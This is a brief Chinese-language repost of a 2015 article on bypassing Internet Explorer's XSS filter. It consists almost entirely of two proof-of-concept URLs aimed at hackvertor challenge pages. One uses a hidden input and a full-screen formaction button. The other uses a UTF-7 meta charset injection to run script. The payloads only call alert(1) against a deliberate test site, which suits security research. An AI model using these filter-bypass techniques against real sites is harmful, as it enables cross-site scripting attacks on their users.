原文地址：http://www.thespanner.co.uk/2015/01/07/bypassing-the-ie-xss-filter/

POC：

http://challenge.hackvertor.co.uk/xss2.php?x=<input type=hidden name=x value=&lt;script&gt;alert(1)&lt;/script&gt;><button formaction=test.php style=width:100%;height:100%;font-size:55pt;position:absolute>PWND</button>

POC2：

http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=utf-7%3E%2BADw-script%2BAD4-alert(1)%2BADw-%2Fscript%2BAD4-